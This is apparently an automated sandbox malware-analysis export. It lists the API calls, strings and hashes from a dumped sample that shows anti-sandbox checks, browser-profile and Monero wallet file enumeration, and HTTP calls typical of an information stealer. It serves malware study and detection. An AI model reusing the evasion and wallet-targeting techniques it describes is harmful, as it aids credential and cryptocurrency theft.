                               • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                              • String ID: ERROR$ERROR$GET
                              • API String ID: 3749127164-2509457195
                              • Opcode ID: c98ed0f7d7054063e2628425d161114b4c2248fce51ccc2486a9c459bc7dfd50
                              • Instruction ID: 47a761aee08d2206fdea0ae03e249894aeded9a15a3b784e257accfab250e3f5
                              • Opcode Fuzzy Hash: c98ed0f7d7054063e2628425d161114b4c2248fce51ccc2486a9c459bc7dfd50
                              • Instruction Fuzzy Hash: 6F713071A00218ABDF14EBE0DC49FEE77BAFB44704F108158F50A6B590DBB46A85CF91

                               Control-flow Graph (rendered graph not included in this export; legend: Executed / Not Executed)
                              APIs
                                • Part of subcall function 0069A820: lstrlen.KERNEL32(00684F05,?,?,00684F05,006A0DDE), ref: 0069A82B
                                • Part of subcall function 0069A820: lstrcpy.KERNEL32(006A0DDE,00000000), ref: 0069A885
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00695644
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006956A1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00695857
                                • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                                • Part of subcall function 006951F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00695228
                                • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                                • Part of subcall function 006952C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00695318
                                • Part of subcall function 006952C0: lstrlen.KERNEL32(00000000), ref: 0069532F
                                • Part of subcall function 006952C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00695364
                                • Part of subcall function 006952C0: lstrlen.KERNEL32(00000000), ref: 00695383
                                • Part of subcall function 006952C0: lstrlen.KERNEL32(00000000), ref: 006953AE
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0069578B
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00695940
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00695A0C
                              • Sleep.KERNEL32(0000EA60), ref: 00695A1B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Similarity
                              • API ID: lstrcpylstrlen$Sleep
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 507064821-2791005934
                              • Opcode ID: 8e11155d94b10eabb3d44939b2d00956f17c7eadaddf05eb5f87ba749bed25df
                              • Instruction ID: cfc8ece2cffd31d26b3e5dbe0e4796384bbf37e3e962b825b63d9111d0cb924e
                              • Opcode Fuzzy Hash: 8e11155d94b10eabb3d44939b2d00956f17c7eadaddf05eb5f87ba749bed25df
                              • Instruction Fuzzy Hash: D1E12E719101089ACF58FBE0DD56EED73BEAB54300F50812CB50766991EF346A0ACBDA

                              Control-flow Graph

                              APIs
                              • StrCmpCA.SHLWAPI(00000000,block), ref: 006917C5
                              • ExitProcess.KERNEL32 ref: 006917D1
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: a2b47c7b1d50cd331285bb15723739c7c79dc9680d8a21305941ef60d7a24bb1
                              • Instruction ID: d860e7095936b6e36769a414f5fda2302a463322563389fbba66acd3682fd0c7
                              • Opcode Fuzzy Hash: a2b47c7b1d50cd331285bb15723739c7c79dc9680d8a21305941ef60d7a24bb1
                              • Instruction Fuzzy Hash: 7F514EB5A0420AEFDF04EFA0DA64ABE77BAFF45704F204059E4056B740D770E952DB62

                              Control-flow Graph

                              APIs
                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00697542
                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0069757F
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00697603
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0069760A
                              • wsprintfA.USER32 ref: 00697640
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              Similarity
                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                              • String ID: :$C$\$j
                              • API String ID: 1544550907-1061487577
                              • Opcode ID: 7482ac05aba658fb4ec23b0a4ec181d9241fa54664e38680b5384cda01aed22b
                              • Instruction ID: 973278ff170cfbe322c18ba6ca48d485ac51b659e5dd64a75b86a32bea6ea52c
                              • Opcode Fuzzy Hash: 7482ac05aba658fb4ec23b0a4ec181d9241fa54664e38680b5384cda01aed22b
                              • Instruction Fuzzy Hash: 9B417CB1D04248ABDF10DF94DC85FEEBBB9BF18704F100199F509A7280DB78AA44CBA5

                              Control-flow Graph

                              APIs
                                • Part of subcall function 00699860: GetProcAddress.KERNEL32(74DD0000,01482398), ref: 006998A1
                                • Part of subcall function 00699860: GetProcAddress.KERNEL32(74DD0000,01482320), ref: 006998BA
                                • Part of subcall function 00699860: GetProcAddress.KERNEL32(74DD0000,014824E8), ref: 006998D2
                                • Part of subcall function 00699860: GetProcAddress.KERNEL32(74DD0000,01482440), ref: 006998EA
                                • Part of subcall function 00699860: GetProcAddress.KERNEL32(74DD0000,01482500), ref: 00699903
                                • Part of subcall function 00699860: GetProcAddress.KERNEL32(74DD0000,014890A8), ref: 0069991B
                                • Part of subcall function 00699860: GetProcAddress.KERNEL32(74DD0000,01475B90), ref: 00699933
                                • Part of subcall function 00699860: GetProcAddress.KERNEL32(74DD0000,01475AB0), ref: 0069994C
                                • Part of subcall function 00699860: GetProcAddress.KERNEL32(74DD0000,01482350), ref: 00699964
                                • Part of subcall function 00699860: GetProcAddress.KERNEL32(74DD0000,01482470), ref: 0069997C
                                • Part of subcall function 00699860: GetProcAddress.KERNEL32(74DD0000,01482488), ref: 00699995
                                • Part of subcall function 00699860: GetProcAddress.KERNEL32(74DD0000,014822D8), ref: 006999AD
                                • Part of subcall function 00699860: GetProcAddress.KERNEL32(74DD0000,01475DD0), ref: 006999C5
                                • Part of subcall function 00699860: GetProcAddress.KERNEL32(74DD0000,01482290), ref: 006999DE
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                                • Part of subcall function 006811D0: ExitProcess.KERNEL32 ref: 00681211
                                • Part of subcall function 00681160: GetSystemInfo.KERNEL32(?), ref: 0068116A
                                • Part of subcall function 00681160: ExitProcess.KERNEL32 ref: 0068117E
                                • Part of subcall function 00681110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0068112B
                                • Part of subcall function 00681110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00681132
                                • Part of subcall function 00681110: ExitProcess.KERNEL32 ref: 00681143
                                • Part of subcall function 00681220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0068123E
                                • Part of subcall function 00681220: __aulldiv.LIBCMT ref: 00681258
                                • Part of subcall function 00681220: __aulldiv.LIBCMT ref: 00681266
                                • Part of subcall function 00681220: ExitProcess.KERNEL32 ref: 00681294
                                • Part of subcall function 00696770: GetUserDefaultLangID.KERNEL32 ref: 00696774
                                • Part of subcall function 00681190: ExitProcess.KERNEL32 ref: 006811C6
                                • Part of subcall function 00697850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006811B7), ref: 00697880
                                • Part of subcall function 00697850: RtlAllocateHeap.NTDLL(00000000), ref: 00697887
                                • Part of subcall function 00697850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0069789F
                                • Part of subcall function 006978E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00697910
                                • Part of subcall function 006978E0: RtlAllocateHeap.NTDLL(00000000), ref: 00697917
                                • Part of subcall function 006978E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0069792F
                                • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,014891A8,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                                • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                                • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                                • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01488FA8,?,006A110C,?,00000000,?,006A1110,?,00000000,006A0AEF), ref: 00696ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00696AE8
                              • CloseHandle.KERNEL32(00000000), ref: 00696AF9
                              • Sleep.KERNEL32(00001770), ref: 00696B04
                              • CloseHandle.KERNEL32(?,00000000,?,01488FA8,?,006A110C,?,00000000,?,006A1110,?,00000000,006A0AEF), ref: 00696B1A
                              • ExitProcess.KERNEL32 ref: 00696B22
                              Similarity
                              • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                              • String ID:
                              • API String ID: 2525456742-0
                              • Opcode ID: 745c9267c832c08cffcdf7ffcf490bf2448e570b142de62ce54f2308fa8e89ae
                              • Instruction ID: 8a88e5bffc9ed59d1d36f04bdf959560f74341457ec5d5fe8cf612b988328366
                              • Opcode Fuzzy Hash: 745c9267c832c08cffcdf7ffcf490bf2448e570b142de62ce54f2308fa8e89ae
                              • Instruction Fuzzy Hash: 4C311A70910208AADF44F7E0DD56AEE77BEBF15740F00461CF202A6581DF705905CBAA

                              Control-flow Graph

                              APIs
                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0068123E
                              • __aulldiv.LIBCMT ref: 00681258
                              • __aulldiv.LIBCMT ref: 00681266
                              • ExitProcess.KERNEL32 ref: 00681294
                              Similarity
                              • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                              • String ID: @
                              • API String ID: 3404098578-2766056989
                              • Opcode ID: 6d7a5d875a1c30e75879e893898dec875d45deae6ae5572c5de064726cef8e7e
                              • Instruction ID: ed1a3f6af167de9d9e8255058f6cb231cfea9303e336892257384aa3d2de76ec
                              • Opcode Fuzzy Hash: 6d7a5d875a1c30e75879e893898dec875d45deae6ae5572c5de064726cef8e7e
                              • Instruction Fuzzy Hash: 61014BB0940308AAEF10EBE4CC5AF9EBB7DAB05705F208158E605BA280D67456868799

                              Control-flow Graph

                              APIs
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01488FA8,?,006A110C,?,00000000,?,006A1110,?,00000000,006A0AEF), ref: 00696ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00696AE8
                              • CloseHandle.KERNEL32(00000000), ref: 00696AF9
                              • Sleep.KERNEL32(00001770), ref: 00696B04
                              • CloseHandle.KERNEL32(?,00000000,?,01488FA8,?,006A110C,?,00000000,?,006A1110,?,00000000,006A0AEF), ref: 00696B1A
                              • ExitProcess.KERNEL32 ref: 00696B22
                              Similarity
                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                              • String ID:
                              • API String ID: 941982115-0
                              • Opcode ID: 464179830521ef39ede81f5e4c1fa1c471822bc1ff69c807afb0e9f8edaff896
                              • Instruction ID: 8c01fd588db536af2437734a59a8990f06b9cad218f2416c73ffa25e9cda55a6
                              • Opcode Fuzzy Hash: 464179830521ef39ede81f5e4c1fa1c471822bc1ff69c807afb0e9f8edaff896
                              • Instruction Fuzzy Hash: B3F0B830A0030EABEF00ABA0CC0AFBE7B7EFB04304F104519B903A19C4DBB05501DAAA

                              Control-flow Graph

                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00684839
                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 00684849
                              Similarity
                              • API ID: CrackInternetlstrlen
                              • String ID: <
                              • API String ID: 1274457161-4251816714
                              • Opcode ID: a6fc900078d9be24ea7f3cf10b1f4ae1c8da7f7f070a2f12304d9c8e9d666bf5
                              • Instruction ID: 867efd340e5c1c52f47eeb4b5413a94960eddc056f89b0aa2c19bf14cce01c58
                              • Opcode Fuzzy Hash: a6fc900078d9be24ea7f3cf10b1f4ae1c8da7f7f070a2f12304d9c8e9d666bf5
                              • Instruction Fuzzy Hash: 5A214FB1D00209ABDF14DFA4E845ADE7B79FB45320F108629F955A72C1EB706A05CF81

                              Control-flow Graph

                              APIs
                                • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                                • Part of subcall function 00686280: InternetOpenA.WININET(006A0DFE,00000001,00000000,00000000,00000000), ref: 006862E1
                                • Part of subcall function 00686280: StrCmpCA.SHLWAPI(?,0148E838), ref: 00686303
                                • Part of subcall function 00686280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00686335
                                • Part of subcall function 00686280: HttpOpenRequestA.WININET(00000000,GET,?,0148DF30,00000000,00000000,00400100,00000000), ref: 00686385
                                • Part of subcall function 00686280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006863BF
                                • Part of subcall function 00686280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006863D1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00695228
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                              • String ID: ERROR$ERROR
                              • API String ID: 3287882509-2579291623
                              • Opcode ID: 20b89c8e7a1f5d4ece60ea0392f5c8ab62da7304406b28107d746b8ff5ddd64c
                              • Instruction ID: 5d5b572b2cc3f9ce8dcfdae00ede409e2a9a880bed4d0adc3af13e6d498735ff
                              • Opcode Fuzzy Hash: 20b89c8e7a1f5d4ece60ea0392f5c8ab62da7304406b28107d746b8ff5ddd64c
                              • Instruction Fuzzy Hash: C011DD70910148A7CF54FBA4DD52AED73BEAF50340F40416CF81A5A992EF30AB06CB9A
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00697910
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00697917
                              • GetComputerNameA.KERNEL32(?,00000104), ref: 0069792F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateComputerNameProcess
                              • String ID:
                              • API String ID: 1664310425-0
                              • Opcode ID: 6586e228a00279567a4fbc1d0b2926f1cefbe968649b0d427b019af112e60f48
                              • Instruction ID: 84f4f5950590af3fcd62e06a685c13f3f40b7809882887ca3e791feb8998aad7
                              • Opcode Fuzzy Hash: 6586e228a00279567a4fbc1d0b2926f1cefbe968649b0d427b019af112e60f48
                              • Instruction Fuzzy Hash: 8B0181B1A04208EBDB04DF98DD45FAABBBCFB04B25F10422AFA45E3680C37559008BA1
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0068112B
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 00681132
                              • ExitProcess.KERNEL32 ref: 00681143
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$AllocCurrentExitNumaVirtual
                              • String ID:
                              • API String ID: 1103761159-0
                              • Opcode ID: b229a3b711e7f73f336dd37ba60da7b43cfafe9f9a87eda4e30a2dff09c6f120
                              • Instruction ID: e32114407423f649bf08dcfb2e3fab7e1f295102d62e347a80f8e7a46b24d2ce
                              • Opcode Fuzzy Hash: b229a3b711e7f73f336dd37ba60da7b43cfafe9f9a87eda4e30a2dff09c6f120
                              • Instruction Fuzzy Hash: B9E0E67094530CFBE7546BA09C0EF49767CFB05B05F104154F7097A5D0D6B52A419799
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 006810B3
                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 006810F7
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$AllocFree
                              • String ID:
                              • API String ID: 2087232378-0
                              • Opcode ID: b0bd933760dc070704358c37edaa009eea0e5388c2f57b00394a101063807f63
                              • Instruction ID: abb53f2ab95196be0a43ee9829758997e9f1d0599a284dfdcc2df8f5da75049d
                              • Opcode Fuzzy Hash: b0bd933760dc070704358c37edaa009eea0e5388c2f57b00394a101063807f63
                              • Instruction Fuzzy Hash: FBF0E271641208BBEB14ABA8AC49FAAB7ECE706B15F300548F504E7280D9729E00CBA4
                              APIs
                                • Part of subcall function 006978E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00697910
                                • Part of subcall function 006978E0: RtlAllocateHeap.NTDLL(00000000), ref: 00697917
                                • Part of subcall function 006978E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0069792F
                                • Part of subcall function 00697850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006811B7), ref: 00697880
                                • Part of subcall function 00697850: RtlAllocateHeap.NTDLL(00000000), ref: 00697887
                                • Part of subcall function 00697850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0069789F
                              • ExitProcess.KERNEL32 ref: 006811C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Process$AllocateName$ComputerExitUser
                              • String ID:
                              • API String ID: 3550813701-0
                              • Opcode ID: a6b69b9f34c7656981b521422e33e9b8e7413bf31a27caa175a191343be9bfbf
                              • Instruction ID: 86063916dce87cf05e20b9b666490c98c209b118acc6fd5ea155ea3d57d60522
                              • Opcode Fuzzy Hash: a6b69b9f34c7656981b521422e33e9b8e7413bf31a27caa175a191343be9bfbf
                              • Instruction Fuzzy Hash: 2CE0ECB592420956CE4473B0AD0AF2A32AE6B16749F040539BA05D6602FA25E801866E
                              APIs
                              • wsprintfA.USER32 ref: 006938CC
                              • FindFirstFileA.KERNEL32(?,?), ref: 006938E3
                              • lstrcat.KERNEL32(?,?), ref: 00693935
                              • StrCmpCA.SHLWAPI(?,006A0F70), ref: 00693947
                              • StrCmpCA.SHLWAPI(?,006A0F74), ref: 0069395D
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00693C67
                              • FindClose.KERNEL32(000000FF), ref: 00693C7C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                              • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                              • API String ID: 1125553467-2524465048
                              • Opcode ID: dada1de0d4af592c62ca3c2be2859d3e9b4c1b1e2f2bab803fea54ac6b68f73c
                              • Instruction ID: 9e8026a8da236e06e74ec0958f162d4e6fa059cd7c6249f7482866e4fd388306
                              • Opcode Fuzzy Hash: dada1de0d4af592c62ca3c2be2859d3e9b4c1b1e2f2bab803fea54ac6b68f73c
                              • Instruction Fuzzy Hash: 5CA161B19002189FDF24EFA4DC85FEA737DFB54300F044588A60DA6641EB759B84CFA2
                              APIs
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                                • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                                • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                                • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,014891A8,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                                • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                                • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                                • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                              • FindFirstFileA.KERNEL32(00000000,?,006A0B32,006A0B2B,00000000,?,?,?,006A13F4,006A0B2A), ref: 0068BEF5
                              • StrCmpCA.SHLWAPI(?,006A13F8), ref: 0068BF4D
                              • StrCmpCA.SHLWAPI(?,006A13FC), ref: 0068BF63
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0068C7BF
                              • FindClose.KERNEL32(000000FF), ref: 0068C7D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                              • API String ID: 3334442632-726946144
                              • Opcode ID: 5a8719cd3608e571f53e8d2140fbd1cf3b0c96c7d329ac7ce8a4f92cec8149d6
                              • Instruction ID: bb528bd5f694eb06a99d664f57c8e545f037bc76af6a54cc0e6b57642ce28442
                              • Opcode Fuzzy Hash: 5a8719cd3608e571f53e8d2140fbd1cf3b0c96c7d329ac7ce8a4f92cec8149d6
                              • Instruction Fuzzy Hash: 974252729101089BDF54FBF0DD96EED73BEAB44300F40465CB90AA6581EE349B49CBE6
                              APIs
                              • wsprintfA.USER32 ref: 0069492C
                              • FindFirstFileA.KERNEL32(?,?), ref: 00694943
                              • StrCmpCA.SHLWAPI(?,006A0FDC), ref: 00694971
                              • StrCmpCA.SHLWAPI(?,006A0FE0), ref: 00694987
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00694B7D
                              • FindClose.KERNEL32(000000FF), ref: 00694B92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s$%s\%s$%s\*
                              • API String ID: 180737720-445461498
                              • Opcode ID: 1a4724820192dff018d151a69397fd339d6e748aa5279ba3076b4a632488a8dc
                              • Instruction ID: 78fc735b6ace992c67b08d689b94c499c69758d53faaadf73f85c9bc69124622
                              • Opcode Fuzzy Hash: 1a4724820192dff018d151a69397fd339d6e748aa5279ba3076b4a632488a8dc
                              • Instruction Fuzzy Hash: E56144B1900218ABCB24EBA0DC49EEA73BDBB49704F04859CB549A6141EF75DB45CF91
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00694580
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00694587
                              • wsprintfA.USER32 ref: 006945A6
                              • FindFirstFileA.KERNEL32(?,?), ref: 006945BD
                              • StrCmpCA.SHLWAPI(?,006A0FC4), ref: 006945EB
                              • StrCmpCA.SHLWAPI(?,006A0FC8), ref: 00694601
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0069468B
                              • FindClose.KERNEL32(000000FF), ref: 006946A0
                              • lstrcat.KERNEL32(?,0148E848), ref: 006946C5
                              • lstrcat.KERNEL32(?,0148DA40), ref: 006946D8
                              • lstrlen.KERNEL32(?), ref: 006946E5
                              • lstrlen.KERNEL32(?), ref: 006946F6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                              • String ID: %s\%s$%s\*
                              • API String ID: 671575355-2848263008
                              • Opcode ID: 3d7351b8f0803406705d14128c1727d51688b41c3b1b8b1bbc744cba8065dcfd
                              • Instruction ID: c6b91625debfb2830a9a7990ccbcb1ccf4af48b1a25618ae5ece774eb695e75e
                              • Opcode Fuzzy Hash: 3d7351b8f0803406705d14128c1727d51688b41c3b1b8b1bbc744cba8065dcfd
                              • Instruction Fuzzy Hash: 7F5153B190021CAFCB64EBB0DC89FE9737DBB58304F404598F64996190EF759B858FA2
                              APIs
                              • wsprintfA.USER32 ref: 00693EC3
                              • FindFirstFileA.KERNEL32(?,?), ref: 00693EDA
                              • StrCmpCA.SHLWAPI(?,006A0FAC), ref: 00693F08
                              • StrCmpCA.SHLWAPI(?,006A0FB0), ref: 00693F1E
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0069406C
                              • FindClose.KERNEL32(000000FF), ref: 00694081
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s
                              • API String ID: 180737720-4073750446
                              • Opcode ID: ce715a5ef81cb4a2634684fe95228f02fe91160028b7274a9921a74719031d4f
                              • Instruction ID: 68bebdad48561e918c3516fb6c1c47a0b03ae3b0a3cd90fcae18f1bf441d0325
                              • Opcode Fuzzy Hash: ce715a5ef81cb4a2634684fe95228f02fe91160028b7274a9921a74719031d4f
                              • Instruction Fuzzy Hash: ED5154B2900218AFCF24FBB0DC85EEA737DBB44304F00459CB65996140EB759B868F95
                              APIs
                              • wsprintfA.USER32 ref: 0068ED3E
                              • FindFirstFileA.KERNEL32(?,?), ref: 0068ED55
                              • StrCmpCA.SHLWAPI(?,006A1538), ref: 0068EDAB
                              • StrCmpCA.SHLWAPI(?,006A153C), ref: 0068EDC1
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0068F2AE
                              • FindClose.KERNEL32(000000FF), ref: 0068F2C3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              Joe Sandbox IDA Plugin
